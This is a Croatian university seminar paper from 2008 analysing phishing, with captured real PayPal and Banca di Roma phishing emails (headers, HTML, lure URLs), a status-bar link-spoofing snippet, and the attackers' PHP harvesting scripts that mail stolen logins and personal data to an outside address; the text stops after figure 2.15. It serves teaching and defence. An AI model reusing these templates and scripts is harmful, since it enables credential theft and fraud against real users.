FAKULTET ELEKTROTEHNIKE I RAČUNARSTVASVEUČILIŠTE U ZAGREBU

SEMINAR

PhishingDrago Ružman

Voditelj: doc. dr. sc. Marin Golub

Zagreb, listopad 2008.

Sadržaj1. Uvod...................................................................................................................................1

2. Izvedba phishinga..............................................................................................................22.1. Elektronička pošta................................................................................................................32.2. Internet stranice..................................................................................................................112.3. Tipovi adresa......................................................................................................................202.4. Tijek novca.........................................................................................................................222.5. Zlonamjerni programi..........................................................................................................22

3. Organizacije.....................................................................................................................243.1. APWG................................................................................................................................243.2. PhishTank...........................................................................................................................253.3. Symantec PRN...................................................................................................................263.4. Google................................................................................................................................27

4. Trendovi...........................................................................................................................28

5. Zaštita..............................................................................................................................345.1. Internet preglednici.............................................................................................................345.2. Filteri neželjene pošte.........................................................................................................355.3. Edukacija............................................................................................................................365.4. Korisnička zaštita................................................................................................................36

5.4.1. Antivirusna zaštita.......................................................................................................................365.4.2. Dodaci za preglednike.................................................................................................................36

5.5. Promjena načina provjere identiteta...................................................................................375.6. Praćenje napadača i sprječavanje napada.........................................................................37

6. Zaključak..........................................................................................................................38

7. Literatura..........................................................................................................................39

1. UvodPhishing je postupak krađe osobnih podataka na Internetu. Nakon što napadač dođe do žrtvinih osobnih podataka, on ih može iskoristiti za lažno predstavljanje, te krađu novca i kupovinu dobara na račun žrtve čije podatke ima. Phishing se najčešće provodi tako da napadač sastavi Internet stranicu identičnu onoj koju žrtva svakodnevno koristi i navede žrtvu da posjeti tu stranicu. Žrtva mora biti uvjerena da se radi o legitimnoj stranici, te kad unese svoje podatke za ulaz u zaštićeni dio, ti podaci se pohranjuju i napadač ih bilo kad može iskoristiti za nanošenje štete žrtvi, odnosno za vlastitu materijalnu korist. Prilikom phishing napada navođenje žrtve da pristupi lažnoj stranici se najčešće provodi preko poruka elektroničke pošte. Žrtva dobiva poruku kako hitno mora pristupiti stranici čija je adresa navedena u poruci i unijeti svoje podatke jer će inače snositi sankcije, odnosno financijske gubitke [7].

Prvi napadi su se dogodili još 1996. godine kad su napadači poslali poruke elektroničke pošte korisnicima AOL Internet servisa. Cilj je bio dobiti važeća korisnička imena i lozinke za ulaz nakon što je AOL onemogućio registraciju s lažnim brojevima kreditnih kartica. Tada je izmišljen i naziv "phishing" koji predstavlja "ribarenje" (engl. fishing) ljudi koristeći elektroničku poštu kao mamac. U tim prvim napadima napadači su djelovali samostalno i samo za vlastitu korist. Danas se ta slika znatno promjenila. Napadači su postali organizirani budući da je potreban veći broj ljudi da se napad provede [12]. Potrebno je imati nekoga tko će izraditi lažnu stranicu, nekoga tko će se pobrinuti da se poruke prošire. Za to se koriste već postojeći kanali distribucije neželjene pošte. Zatim potreban je netko tko će pokupiti novac na kraju napada. Novac se često šalje u inozemstvo pa je teško doći do stvarnog organizatora.

Danas postoji nekoliko organizacija koje se bave proučavanjem phishing napada i njihovim sprječavanjem. Najpoznatije su Anti-Phishing Working Group (APWG) i PhishTank koji je pod pokroviteljstnom OpenDNS-a. APWG je komercijalna institucija, tj. naplaćuje članarinu da bi se moglo pristupiti informacijama koje posjeduje. PhishTank je s druge strane potpuno otvorena organizacija i njene informacije mogu koristiti svi bez ikakve naknade.

U novije vrijeme napadaju se korisnici širokog spektra organizacija, ali najčešće žrtve su članovi financijski institucija [1]. Tako se danas svakodnevno pronalazi velik broj phishing stranica koje ciljaju na korisnike PayPala, Natwesta, JP Morgana, eGolda i raznih drugih financijskih, ali i tržišnih organizacija poput eBaya [2]. Mjesečno PhishTank zabilježi preko 10.000 različitih poruka elektroničke pošte [2], a najčešći ciljevi u 2008. su eBay, PayPal, Citibank, Banca di Roma i razne druge banke. APWG mjesečno otkrije preko 20.000 phishing Internet stranica kojima je prosječni životni vijek oko 3 dana, međutim postoje i one koje se održe i do 30 dana [1].

Zbog sve češćih phishing napada sve veći broj kompanija pruža zaštitu od phishinga. U najpopularnije Web preglednike je ugrađena zaštita u obliku provjere svake adrese kojoj se pristupa. Microsoft, Google, Symantec i razne druge računalne kompanije pružaju mogućnost zaštite za krajnje korisnike.

1

2. Izvedba phishingaZa uspješan phishing napad potrebno je pripremiti Internet stranicu koja je vizualno identična stranicama organizacije na koju se cilja. Zatim je potrebno sastaviti poruku koja žrtvu navodi da posjeti pripremljenu Internet stranicu i upiše tražene podatke. Tu poruku je žrtvi potrebno dostaviti elektroničkom poštom. Da bi žrtva povjerovala poruci, poruka mora biti uvjerljiva. Uvjerljivost se postiže korištenjem stilova i grafika koje imitirana organizacija i inače koristi, te tonom poruke koji naglašava važnost i hitnost. Kad korisnik posjeti phishing stranicu, od njega se najčešće traži unos korisničkog imena i lozinke kao i za ulaz na pravu stranicu. Međutim, u nekim napadima se osim ovih osnovnih, traže i mnogi drugi podaci. Moguće je da napadač traži unos sigurnosnih pitanja i odgovora na ta pitanja, a ako se radi o bankama, napadač može tražiti brojeve kreditnih kartica, PIN-ove, datum rođenja, stvarno ime i prezime, te razne druge podatke.

Nakon što dođe do žrtvinih podataka, napadač mora djelovati brzo i iskoristiti podatke prije nego žrtva shvati da se radilo o prijevari i zablokira kompromitirane račune. Ako se radi o financijskim institucijama, žrtvin novac se najčešće prebacuje u inozemstvo preko institucija poput eGolda ili Western Uniona. eGold je dugo bio napadačima najomiljeniji alat za ilegalne transakcije jer su vlasnici odbijali vlastima davati bilo kakve informacije o transakcijama koje se provode. To se u novije vrijeme promijenilo, pa istražitelji mogu dobiti podatke koje traže, međutim još uvijek nije moguće zaustaviti jednom pokrenutu transakciju i spriječiti isplatu novca u inozemstvu [10].

Cijeli phishing napad može propasti iz nekoliko razloga. Najranjivije su poruke elektroničke pošte. Budući da se te poruke distribuiraju istim kanalima kao i ostala neželjena pošta, filteri na poslužiteljima elektroničke pošte napadačeve poruke eliminiraju, te napad na potencijalnu žrtvu propada. Osim filtera, problem predstavlja masovno širenje poruka, tj. slanje na sve adrese koje napadač posjeduje, pa mnogi primatelji ne koriste usluge imitirane organizacije i napad propada. Phishing poruke i Internet stranice često sadrže greške, što iskusnijeg korisnika navodi na sumnju, te napad propada. Ako poruka dođe do prave osobe, i ta osoba postupi prema uputama, onda napadač dobiva vrijedne podatke koje može iskoristiti protiv žrtve.

Prema organiziranosti, napadače je moguće razvrstati u dvije kategorije [12]. Prvu kategoriju je moguće opisati pomoću "handwerker" modela. To su napadači koji rade potpuno samostalno. Jedna osoba kreira stranicu, šalje poruke, te iskorištava dobivene podatke. Takvi napadači obično nemaju velike tehničke vještine, pa napadi nisu sofisticirani, što je vidljivo i na realizaciji stranica i poruka. Osim toga, njihovi tekstovi često sadrže pogreške zbog uporabe alata za automatsko prevođenje. Samostalni napadači nemaju fleksibilnost potrebnu za prikrivanje napada, pa često ni ne slute da mjerodavne službe prate sve njihove korake.

U drugu kategoriju pripadaju napadači koji rade prema "camorra" modelu. Prema tom modelu napad vrši organizirana skupina. Sudionike skupine je, prema ulozi, moguće razvrstati u 3 kategorije:

1. Dizajneri stranica i poruka. Oni su zaduženi za izradu Internet stranica i poruka elektroničke pošte čij je dizajn vješta imitacija dizajna koji koristi ciljana organizacija.

2. Osiguravatelji smještaja. Oni su zaduženi da stranica bude dostupna na Internetu. Moguće je koristiti zakupljene poslužitelje, druge provaljene stranice ili zaražena računala.

3. Financijski agenti. Oni prebacuju novac s kompromitiranih računa na račune koji se nalaze u inozemstvu ili šalju novac putem servisa poput eGolda.

2

2. Izvedba phishinga

4. Organizatorovi pouzdanici. Oni sakupljaju novac koji im šalju financijski agenti, te ga šalju organizatoru.

Ti napadači su visokoorganizirani i svaki od njih dobro zna svoj posao, a osim toga svjesni su da vlasti pokušavaju pratiti njihove aktivnosti, te zbog toga ulažu velike napore u skrivanje vlastitih tragova i ostavljanje takvih koji će istražitelje navesti na krivi put.

Pharming napadi su napadi slični phishing napadima. Bitna razlika je da se umjesto poruka elektroničke pošte koristi trovanje DNS poslužitelja, odnosno preusmjeravanje prometa na IP adresu koja je pod kontrolom napadača. Na primjer, moguće je za dio korisnika adresu www.paypal.com preusmjeriti na IP adresu na kojoj se nalazi stranica pod kontrolom napadača, a koja je vizualno identična PayPalovoj. Tako napadač može doći do žrtvinih osobnih podataka, jer žrtva ima mnogo manje mogućnosti da otkrije da se radi o napadu. U stvarnosti je pharming napade vrlo teško izvesti, međutim u slučaju uspjeha gubici su mnogo veći nego kod phishing napada.

Alati kojima se napadači služe nisu poznati, međutim postoje naznake da je na crnom tržištu moguće kupiti gotove alate za stvaranje lažnih stranica i slanje pošte [9]. Uz takve alate, eventualnom napadaču je relativno jednostavno pripremiti tehnički dio napada. Uz to mu ostaje samo organiziranje mreže za skupljanje novca (ukoliko se radi o napadu na financijsku organizaciju). Za slanje pošte može koristiti već aktivne mreže računala zaraženih malicioznim programima za širenje neželjene pošte.

2.1. Elektronička poštaVećina poruka koje navode primatelja da posjeti neku lažnu Internet stranicu je vrlo sličnog sadržaja. Sve one sadrže poveznicu na lažnu stranicu i tekst koji uvjerava potencijalnu žrtvu da posjeti tu stranicu i ostavi svoje podatke. Razlozi koji se navode mogu biti vrlo raznoliki, međutim najčešći su sljedeći:

● pojavila se greška u osobnim podacima i korisnik ih treba čim prije ispraviti jer će inače njegov račun biti blokiran

● pojavila se sumnjiva transakcija iz inozemstva (za financijske institucije) i korisnik čim prije treba provjeriti o čemu se radi

● dogodio se kvar na poslužiteljima davatelja usluge i korisnik hitno mora obnoviti svoje podatke

U samom početku phishinga poruke su odmah sadržavale i HTML forme u koje je bilo potrebno upisati tražene podatke [7]. Danas više nema takvih poruka. Glavni cilj današnjih poruka je navesti korisnika da posjeti zadanu stranicu i na njoj upiše tražene osobne podatke.

Sadržaj poruke elektroničke pošte mora biti formuliran tako da uvjeri primatelja u autentičnost pošiljatelja i istinitost navoda koje sadrži. Da bi se to postiglo, često je u tekstu poruke istaknuta važnost i hitnost postupka na koji se navodi korisnika. Osim toga, poruke sadrže grafičke detalje i stilove koji se i stvarno koriste u organizaciji koju se imitira. Domena adrese pošiljatelja poruke redovito odgovara domeni organizacije.

Osim toga, često se skrivaju stvarna odredišta poveznica koje su navedene da ih treba posjetiti [7]. To se ostvaruje pomoću <a href> HTML oznake koju je moguće upotrijebiti tako da adresa prikazana na ekranu i stvarno odredište budu različiti. Pomoću onMouseOver javascript naredbe je moguće sakriti pravu destinaciju koja se ispisuje u statusnoj traci na dnu prozora internet preglednika. Na slici 2.1 je dan primjer uporabe onMouseOver javascript naredbe.

3

2. Izvedba phishinga

<a href="http://www.attack.com" onMouseOver="window.status='http://www.paypal.com'; return true;"onMouseOut="window.status=''; return true;">http://www.paypal.com</a>

Slika 2.1: Primjer uporabe <A HREF> i onMouseOver

Iako napadači nastoje sastaviti čim bolju i uvjerljiviju poruku, uvijek postoje nedostaci u tekstu zbog kojih bi oprezniji korisnik mogao shvatiti da se radi o prijevari. Velik broj poruka je gramatički ili pravopisno neispravan, pa to odmah može pobuditi sumnju budući da ni jedna ozbiljna kompanija ne bi slala takve poruke. Tekstovi poruka gotovo redovito započinju potpuno općenito poput "Dear paypal user" ili "Dear valued costumer". To je posljedica načina distribucije poruka. Ista se poruka šalje velikom broju korisnika, pa nije moguće pojedinačno prozivanje. Osim toga, napadači najčešće nemaju informacija o korisnicima organizacija koje imitiraju pa ne znaju kome treba poslati poruke. To bi odmah trebalo navesti primatelja poruke da razmisli o autentičnosti budući da svaka organizacija zna imena svojih članova.

Dok god adresa pošiljatelja izgleda legitimno, dio korisnika će povjerovati da je poruka autentična. Međutim, pošiljatelj može biti bilo tko jer je u zaglavlju poruke relativno jednostavno krivotvoriti adresu pošiljatelja. Zbog načina rada elektroničke pošte, stvarni pošiljatelj može naći poslužitelja elektroničke pošte koji neće provjeriti da se adresa pošiljatelja i IP adresa s koje se šalje podudaraju, pa je pod adresu pošiljatelja moguće upisati gotovo bilo koju adresu. A da se ne bi izazvala sumnja, u tekstu se često navodi da je ovo automatski generirana poruka i da se upiti ne šalju na tu adresu jer odgovora neće biti. Detaljnim proučavanjem zaglavlja moguće je vidjeti da se IP adresa stvarnog pošiljatelja ne nalazi u rasponu adresa koje koristi imitirana kompanija, te da je poruka zapravo lažna.

Javascript se u poruci, osim za skrivanje stvarnih destinacija poveznica, može iskoristiti i za preuzimanje nepoželjnih programa (engl. malware) na računalo. Takvi programi kasnije na razne načine mogu doći do korisnikovih lozinki i drugih osobnih podataka.

Phishing poruke se žrtvama distribuiraju već uhodanim kanalima masovnog slanja neželjene pošte (engl. spam). Tu se nalazi i prvi korak zaštite jer će dobar filter pošte uz ostale neželjene poruke izbaciti i phishing poruke, pa do stvarnog napada nikad neće doći. Neželjena pošta se uglavnom distribuira preko umreženih računala zaraženih nekim od zlonamjernih programa (engl. botnets). Jedan od najpoznatijih programa je Storm crv [25]. Njega korisnici obično dobiju elektroničkom poštom. Kad korisnik preuzme poruku i pokrene privitak (engl. attachment), crv se instalira na računalo i pretraži sve dokumente za adresama elektroničke pošte. Nakon toga se spaja na druga zaražena računala, pokupi tamo pronađene adrese i njima svima dostavi adrese koje je on pronašao. Nakon toga su sva zaražena računala spremna da proslijede bilo kakvu poruku na sve adrese koje posjeduju.

Na slikama 2.2, 2.3 i 2.4 je dan prikaz jedne tipične phishing poruke. Ova poruka nije bila dostavljena žrtvi jer je na žrtvinom poslužitelju označena kao neželjena pošta. Na slikama 2.5, 2.6 i 2.7 je prikazana još jedna phishing poruka. Ta poruka cilja na korisike talijanske banke Banca di Roma. Obje poruke su zaustavljene prilikom prolaska kroz filter na poslužitelju iluvator.zemris.fer.hr.

4

2. Izvedba phishinga

Return-Path: <>Delivered-To: bad-header-quarantineX-Envelope-From: <akstcablusitaniamnsdgs@ablusitania.com>X-Envelope-To: <xxxxx@zemris.fer.hr>X-Quarantine-ID: <H9sFFq+f5D5i>X-Amavis-Alert: BAD HEADER Non-encoded 8-bit data (char AE hex): Subject:

PayPal\256 Account Review[...]X-Spam-Flag: NOX-Spam-Score: 4.973X-Spam-Level: ****X-Spam-Status: No, score=4.973 tag=3 tag2=6.3 kill=6.3 tests=[BAYES_50=0.001,

HTML_IMAGE_ONLY_24=1.552, HTML_MESSAGE=0.001,HTML_SHORT_LINK_IMG_3=0.001, MIME_HTML_ONLY=1.457,RCVD_IN_BL_SPAMCOP_NET=1.96, SUBJECT_NEEDS_ENCODING=0.001]

Received: from iluvatar.zemris.fer.hr ([127.0.0.1])by localhost (iluvatar.zemris.fer.hr [127.0.0.1]) (amavisd-new, port 10024)with ESMTP id H9sFFq+f5D5i for <xxxxx@zemris.fer.hr>;Sat, 5 Apr 2008 05:59:13 +0200 (CEST)

Received: from labs3.cc.fer.hr (labs3.cc.fer.hr [161.53.72.21])(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))(No client certificate requested)by iluvatar.zemris.fer.hr (Postfix) with ESMTP id 7E34D13C2B6for <xxxxx.xxxxxxxxx@zemris.fer.hr>; Sat, 5 Apr 2008 05:59:13 +0200 (CEST)

Received: from archimede (host206-219-dynamic.7-87-r.retail.telecomitalia.it [87.7.219.206])

by labs3.cc.fer.hr (8.13.8+Sun/8.12.10) with ESMTP id m354028j010913;Sat, 5 Apr 2008 06:00:04 +0200 (CEST)

Received: from [87.7.219.206] by mail.ablusitania.com; Sat, 5 Apr 2008 05:00:04 +0100Date: Sat, 5 Apr 2008 05:00:04 +0100From: support@paypal.comX-Mailer: The Bat! (v3.5.25) EducationalReply-To: akstcablusitaniamnsdgs@ablusitania.comX-Priority: 3 (Normal)Message-ID: <378668938.73675501365543@ablusitania.com>To: xxxxx.xxxxx@fer.hrSubject: PayPal® Account Review DepartmentMIME-Version: 1.0Content-Type: text/html; charset=Windows-1252Content-Transfer-Encoding: 7bit

Slika 2.2: Zaglavlje phishing poruke

5

2. Izvedba phishinga

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><HTML><HEAD><TITLE></TITLE></HEAD><BODY><style type="text/css"><!--style3 {font-size: 14px}style4 {font-size: 12px; }--></style><table width="522" border="0"> <tr> <td><a href="https://www.paypal.com"><img src="https://www.paypal.com/images/paypal_logo.gif" width="117" height="35" border="0" /></a></td> </tr> <tr> <td width="516"><P class="style3">Dear <strong>PayPal &reg;</strong> customer,</P> <P class="style3">We recently reviewed your account, and we suspect an unauthorized transaction on your account.<BR> Protecting your account is our primary concern. As a preventive measure we have temporary<strong> limited</strong> your access to sensitive information.<BR> Paypal features.To ensure that your account is not compromised, simply hit "<strong>Resolution Center</strong>" to confirm your identity as member of Paypal.</P> <ul class="style3"> <li> Login to your Paypal with your Paypal username and password.</U></li> <li> Confirm your identity as a card memeber of Paypal.</U></li> </ul> <P class="style3"> </P> <TABLE cellSpacing=0 cellPadding=5 width="100%" align=center bgColor=#ffeeee> <TBODY> <TR> <TD class="style3"><SPAN class=emphasis>Please confirm account information by clicking here <A href="http://www.cancantheclown.com/np/paypal.com/index.html"target="_self">Resolution Center</A> and complete the "Steps to Remove Limitations." </SPAN></TD> </TR> </TBODY> </TABLE> <P class="style4"> </P> <P class="style4"><strong>*</strong>Please do not reply to this message. Mail sent to this address cannot be answered.</P> <P><span class="style <P><span class="style3">Copyright © 1999-2008 PayPal. All rights reserved.<BR></BODY></HTML>

Slika 2.3: Tijelo phishing poruke

6

2. Izvedba phishinga

7

Slika 2.4: PayPal phishing poruka

2. Izvedba phishinga

Return-Path: <>Delivered-To: spam-quarantineX-Envelope-From: <clienti@bancaroma.it>X-Envelope-To: <xxxxxxx@zemris.fer.hr>X-Quarantine-ID: <J5abCCxKqTj3>X-Spam-Flag: YESX-Spam-Score: 10.25X-Spam-Level: **********X-Spam-Status: Yes, score=10.25 tag=3 tag2=6.3 kill=6.3 tests=[BAYES_50=0.001,

FORGED_MUA_OUTLOOK=3.116, FORGED_OUTLOOK_HTML=0.001,HIDE_WIN_STATUS=2.499, HTML_IMAGE_ONLY_24=1.552, HTML_MESSAGE=0.001,MIME_HTML_ONLY=1.457, MSGID_FROM_MTA_HEADER=0.803,MSOE_MID_WRONG_CASE=0.82]

Received: from iluvatar.zemris.fer.hr ([127.0.0.1])by localhost (iluvatar.zemris.fer.hr [127.0.0.1]) (amavisd-new, port 10024)with ESMTP id J5abCCxKqTj3 for <marcupic@zemris.fer.hr>;Sat, 5 Apr 2008 20:38:09 +0200 (CEST)

Received: from labs3.cc.fer.hr (labs3.cc.fer.hr [161.53.72.21])(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))(No client certificate requested)by iluvatar.zemris.fer.hr (Postfix) with ESMTP id AEAC313C2BBfor <xxxxx.xxxxx@zemris.fer.hr>; Sat, 5 Apr 2008 20:38:09 +0200 (CEST)

Received: from vestelitaly.com (host83-226-static.18-80-b.business.telecomitalia.it [80.18.226.83])

by labs3.cc.fer.hr (8.13.8+Sun/8.12.10) with ESMTP id m35Id3OZ011891for <xxxxx.xxxxx@fer.hr>; Sat, 5 Apr 2008 20:39:04 +0200 (CEST)

Message-Id: <200804051839.m35Id3OZ011891@labs3.cc.fer.hr>Received: from User by vestelitaly.com

(MDaemon PRO v9.6.2)with ESMTP id md50000460184.msgfor <xxxxx.xxxxx@fer.hr>; Sat, 05 Apr 2008 16:11:48 +0200

From: "UniCredit Banca Di Roma"<clienti@bancaroma.it>Subject: Comunicazione Urgente Banca di Roma - Servizio ClientiDate: Sat, 5 Apr 2008 09:58:40 -0400MIME-Version: 1.0Content-Type: text/html;

charset="Windows-1251"Content-Transfer-Encoding: 7bitX-Priority: 1X-MSMail-Priority: HighX-Mailer: Microsoft Outlook Express 6.00.2600.0000X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000X-Authenticated-Sender: info@vestelitaly.comX-Spam-Processed: vestelitaly.com, Sat, 05 Apr 2008 16:11:48 +0200

(not processed: message from trusted or authenticated source)X-MDRemoteIP: 24.11.178.38X-Return-Path: clienti@bancaroma.itX-Envelope-From: clienti@bancaroma.itX-MDaemon-Deliver-To: xxxxx.xxxxx@fer.hrX-MDAV-Processed: vestelitaly.com, Sat, 05 Apr 2008 16:11:53 +0200Apparently-To: <xxxxx.xxxxx@fer.hr>To: undisclosed-recipients:;

Slika 2.5: Zaglavlje phishing poruke

8

2. Izvedba phishinga

<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Comunicazione Urgente</title></head> <body> <div style="width: 600px; margin: 0 auto 0 auto; border: 0px dashed black; padding: 20px 15px 1px 15px; font-size: 12px"><img src="http://image.bayimg.com/daihoaabb.jpg" width="600" height="60" /> <br><br><b>Gentile CLIENTE ,</b><br><br><p style="font-weight: bold; color: #072510; font-family: arial;" align="justify">Nell'ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione deiservizi di Banca Di Roma e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale. </p><p style="font-weight: bold; color: #072510; font-family: arial;" align="justify">L'inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gliart. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reatopenalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro ilriciclaggio e la transparenza dei dati forniti in auto certificazione. </p><p style="font-weight: bold; color: #072510; font-family: arial;" align="justify">Per ovviare al problema e necessaria la verifica e l'aggiornamento dei dati relativi all'anagrafica dell'Intestatario dei servizi bancari. </p><p style="font-weight: bold; color: #072510; font-family: arial;" align="justify"> Effetuare l'aggiornamento dei dati cliccando sul seguente collegamento sicuro:<p style="font-weight: bold; color: #074580; font-family: arial;" align="center"><a style="color: #074580" href="http://c-24-130-151-178.hsd1.ca.comcast.net/bancaroma.it/Roma.php?applicazione=index.asp">Accedi a collegamento sicuro >></a></p> </a><a onmouseover="rollem('2');window.status='';return true;" onmouseout="hidem('2');" </a></td> <div align="center" style="margin-top: 20px;MARGIN-BOTTOM: 10px; COLOR: #666666; font-family: arial; text-align: center; background-image: url('http://www.chase.com/ccpmweb/generic/image/footer_gradient.gif'); height: 30px">Copyright 2000 / 2008 Unicredit Banca di Roma - Privacy - Norme di trasparenza - Partita IVA 06978161005 </div></body></html>

Slika 2.6: Tijelo phishing poruke

9

2. Izvedba phishinga

10

Slika 2.7: Banca di Roma phishing poruka

2. Izvedba phishinga

2.2. Internet stranicePočetna stranica na koju pokazuje adresa u dobivenoj poruci je najčešće identična kopija početne stranice organizacije koju se imitira. Međutim, ako zbog specifične namjene (krađa podataka) nije identična, i onda se koriste jednaki stilovi, grafike i logotipovi kao i na originalu.

Najjednostavniji model lažne stranice sastoji se od gotovo doslovno prepisanog HTML i CSS koda s originala uz jednu bitnu izmjenu. Da bi napadač došao do lozinki, mora preusmjeriti adresu na koju će se proslijediti podaci nakon pritiska na gumb "SUBMIT" ili "LOGIN". To se postiže kreiranjem jednostavne PHP skripte na serveru koja ovisno o izvedbi prihvaća GET ili POST zahtjeve, te pohranjuje dobivene podatke. Nakon kreiranja PHP skripte, još je jedino potrebno ubaciti adresu skripte u FORM oznaku u HTML dokumentu.

Lažnu stranicu je relativno jednostavno postaviti na Internet. Postoji nekoliko mogućnosti. Prva je da se koristi besplatni poslužitelj poput freesitespace.com ili awardspace.com. To je potpuno besplatna i relativno anonimna varijanta. Druga mogućnost je zakup prostora na poslužitelju u zemljama koje nemaju definirane zakone o računalnom kriminalu. Treća mogućnost je izgradnja mreže zaraženih računala (engl. botnets) koja će služiti kao HTTP poslužitelji [20]. Jedna takva mreža može dati veliku fleksibilnost i dosta dug životni vijek stranice. Prilikom upotrebe besplatnih poslužitelja, vrijeme gašenja stranice je relativno kratko. Međutim, ako se koristi plaćeni hosting, pogotovo u zemljama dalekog istoka, onda gašenje stranice može potrajati i do mjesec dana.

Povremeno su potrebne neke izmjene na lažnoj stranici da bi ona mogla služiti svojoj svrsi. Prilikom tih izmjena može doći do gramatičkih ili pravopisnih grešaka, pogotovo ako se radi o stranici koja nije na engleskom jeziku. Tako se na stranicama koje imitiraju češku financijsku stranicu servis24.cz često pojavljuju izmiješani dijelovi češkog i engleskog teksta što bi potencijalnu žrtvu sigurno trebalo navesti na sumnju. Prikaz jedne takve stranice dan je na slici 2.8. Stranica je bila smještena na adresi http://host81-149-81-234.in-addr.btopenworld.com/www1.servis24.cz/index.htm.

11

2. Izvedba phishinga

U nekim napadima se osim korisničkog imena i lozinke pokušava doći i do drugih podataka. U tim slučajevima se nakon uspješnog ulaza u zaštićeni dio lažne stranice otvara još jedna stranica s većim brojem polja za popuniti. Kod financijskih prijevara često se traže brojevi kreditnih kartica i pripadni PIN-ovi, a osim toga povremeno i ime, prezime, adresa, datum rođenja, imena roditelja i slični podaci koji bi se mogli iskoristiti u financijskim prijevarama. Ta nova stranica koja se otvori stilski je identična originalu. Sadrži jednake grafičke detalje i stil tako da je teško prepoznati da se radi o lažnoj stranici.

Nakon što korisnik unese svoje podatke i pritisne gumb za ulaz, najčešće se ne dogodi ništa. Ali samo prividno. Ako napadač nema namjeru doći do drugih podataka osim korisničkog imena i lozinke, onda redovito preusmjerava korisnika na originalnu stranicu na koju je htio ući. To može zbuniti korisnika, ali vjerojatno u tom slučaju korisnik pretpostavi da se radilo o grešci i pokuša ponovno.

Podaci s kojima korisnik pokuša ući na lažnu stranicu se često ne provjeravaju u bazi korisnika originalne stranice. To omogućuje da se na lažnu stranicu unesu bilo kakvi podaci i ulaz će proći, tj.

12

Slika 2.8: Stranica za napad na korisnike servis24.cz

2. Izvedba phishinga

neće biti dojave o nepoznatom korisničkom imenu ili pogrešnoj lozinki. Jedina za sad poznata iznimka su plagijati stranica talijanske banke Banca di Roma (svi pronađeni) i neki plagijati aukcijske kompanije eBay.

Prilikom izrade lažne stranice sve poveznice osim one za slanje osobnih podataka i dalje ostaju pokazivati na dijelove originalne stranice. Tako često ostaju dostupna, a povremeno i istaknuta, upozorenja o phishingu i zaštiti osobnih podataka. To dodatno može zbuniti sumnjičave korisnike i uvjeriti ih da je stranica prava.

Na Internet stranicama se često događaju manje izmjene vezane uz dizajn i podatke koji će biti prikazani. Kad napadači odluče iskopirati neku stranicu i pripremiti napad, oni kopiraju original koji im je dostupan u tom trenutku. U sljedećem trenutku taj original već može biti promijenjen. Zbog toga povremeno dolazi do upotrebe zastarjelih kopija za napad. To bi česte posjetitelje originala moglo navesti na sumnju jer se u stvarnosti ne radi povratak na prethodni dizajn.

Prilikom prijenosa osobnih podataka preko Interneta savjesne institucije redovito vezu osiguravaju SSL, odnosno TLS protokolom kako bi se izbjeglo prisluškivanje i krađa podataka. Kod učitavanja stranice osigurane SSL/TLS-om svaki Internet preglednik raznim znakovima upozorava korisnika da se radi o sigurnoj vezi. Najčešći znakovi sigurne veze su istaknuti HTTPS protokol umjesto HTTP i promijenjena boja adresne trake, te sličica lokota u statusnoj traci na dnu preglednika. Prilikom upotrebe SSL/TLS-a stranica koja se učitava mora prikazati valjani certifikat koji je potpisala agencija za izdavanje certifikata. Ako je istekao rok valjanosti certifikata ili ako potpisnik certifikata nije poznat, preglednik javlja da certifikat nije u redu i da postoji mogućnost od kompromitiranja sigurne veze. Budući da je u certifikat upisana i potpisana adresa stranice na koju se on odnosi nije moguće prenijeti certifikat s jedne stranice na drugu. Zbog toga varalice izbjegavaju upotrebu sigurne veze. Ako bi uzeli originalni certifikat, on ne bi bio valjan jer je namijenjen za drugu stranicu. Ako bi pak išli u izradu certifikata, taj certifikat ne bi htjela potpisati ni jedna pouzdana agencija. Da korisnik ne bi postao sumnjičav u pogledu sigurnosti prijenosa podataka, znakovi sigurne veze u pregledniku nadoknađuju se sa znakovima sigurne veze (npr. SSL lokotom) i tekstovima o sigurnosti na samoj stranici. Iz toga iskusni korisnik lako može zaključiti da se radi o prijevari, međutim manje iskusni će povjerovati da je stranica potpuno sigurna.

Na slikama 2.9-2.11 je prikazana stranica koja se koristila za napad na korisnike Halifaxa.

13

2. Izvedba phishinga

14

Slika 2.9: Primjer lažne Halifax stranice

2. Izvedba phishinga

15

Slika 2.10: Pitanja za provjeru na lažnoj Halifax stranici

2. Izvedba phishinga

Na slikama 2.12 i 2.13 je prilazan primjer napada na korisnike PayPala. Stranica je bila aktivna na http://202.158.145.88/ePMS/paypal/profile/account/security/index.html. Početna stranica je bila identična originalnoj, a nakon unosa korisničkog imena i lozinke korisnik bi bio preusmjeren najprije na stranicu na slici 2.12, a zatim na stranicu na slici 2.13. Prilikom pritiska na gumb za ulaz na glavnoj stranici izvršila se skripta verify.php prikazana na slici 2.14, a prilikom pritiska na gumb SUBMIT na slikama 2.12 i 2.13 izvršile su se skripte step2.php i step3.php prikazane na slikama 2.15 i 2.16.

16

Slika 2.11: Unos osobnih podataka na lažnoj Halifax stranici

2. Izvedba phishinga

17

Slika 2.12: Primjer lažne PayPal stranice

2. Izvedba phishinga

18

Slika 2.13: Primjer lažne PayPal stranice

2. Izvedba phishinga

<?session_start();$Email = $_POST['Email'];$Password = $_POST['Password'];

//sending email info here$ip = getenv("REMOTE_ADDR");

$subj = "IP - $ip | PayPal | - Login -"; $msg = "IP: $ip\n\nEmail: $Email\nPassword: $Password"; $from = "From: PayPal<another@one.com>"; mail("geamantan@gmail.com", $subj, $msg, $from); header("Location: processing1.html");

?>Slika 2.14: Ispis skripte verify.php

<?session_start();$pa = $_POST['pa'];$pc = $_POST['pa'];$ps = $_POST['pa'];$pz = $_POST['pa'];

//sending email info here$ip = getenv("REMOTE_ADDR");

$subj = "IP - $ip | PayPal | - Step2 - "; $msg = "IP: $ip\n\nPrevious Street Address: $pa\nPrevious City: $pc\nPrevious State: $ps\nPrevious Zip: $pz"; $from = "From: PayPal<another@one.com>"; mail("geamantan@gmail.com", $subj, $msg, $from); header("Location: processing3.html");

?>Slika 2.15: Ispis skripte step2.php

19

2. Izvedba phishinga

